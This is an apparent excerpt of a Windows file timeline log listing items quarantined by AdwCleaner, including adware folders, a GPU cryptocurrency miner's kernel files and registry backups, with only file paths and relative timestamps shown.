         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.3s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.3s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.2s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
          0.0s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
          0.1s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
          0.1s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
          0.2s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
          0.2s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
          0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
          0.4s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
          0.4s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
          0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
          0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.5s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.5s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.5s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.5s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.5s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.6s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.6s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.6s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.6s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.7s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.8s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.9s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.9s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.9s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.9s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.9s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          1.0s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          1.0s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          1.0s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          1.0s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          1.0s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          1.0s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          1.1s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          1.1s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          1.1s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          1.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          1.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          1.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          1.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          1.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          1.2s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          1.3s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          1.3s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          1.3s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          1.3s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          1.4s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.4s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.4s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.5s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.5s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.5s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.5s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.5s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.6s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.6s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.6s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.7s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.7s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.7s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.7s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.8s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.8s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.8s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.8s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.8s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.9s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          2.1s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          6.4s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.5s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.5s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.6s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          7.3s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.7s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          8.2s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.4s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         12.3s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

